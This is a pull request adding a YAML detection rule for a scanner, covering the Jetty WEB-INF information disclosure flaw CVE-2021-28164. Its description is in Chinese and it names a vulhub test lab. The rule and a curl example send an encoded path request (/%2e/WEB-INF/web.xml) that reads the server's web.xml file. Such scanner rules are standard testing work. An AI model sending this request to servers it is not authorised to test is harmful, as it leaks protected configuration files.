### PR TITLE
Jetty WEB-INF 敏感信息泄露漏洞（CVE-2021-28164）

### DIFF
--- a/pocs/jetty-cve-2021-28164.yml
+++ b/pocs/jetty-cve-2021-28164.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-jetty-cve-2021-28164
+rules:
+    - method: GET
+      path: /%2e/WEB-INF/web.xml
+      expression: |
+         response.status == 200 && response.body.bcontains(b"web-app")
+detail:
+    VulnUrl: curl -v  http://domain:port/%2e/WEB-INF/web.xml
+    CVE: Jetty WEB-INF 敏感信息泄露漏洞（CVE-2021-28164）
+    Author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x)                
+    links:
+      - https://www.linuxlz.com/aqld/2309.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Jetty WEB-INF 敏感信息泄露漏洞（CVE-2021-28164）
## 测试环境
https://github.com/vulhub/vulhub/tree/master/jetty
## 备注
<img width="595" alt="截屏2021-08-17 下午1 10 46" src="https://user-images.githubusercontent.com/89016498/129667164-b47176ae-5bc3-4237-9e6c-71d7e23fb389.png">
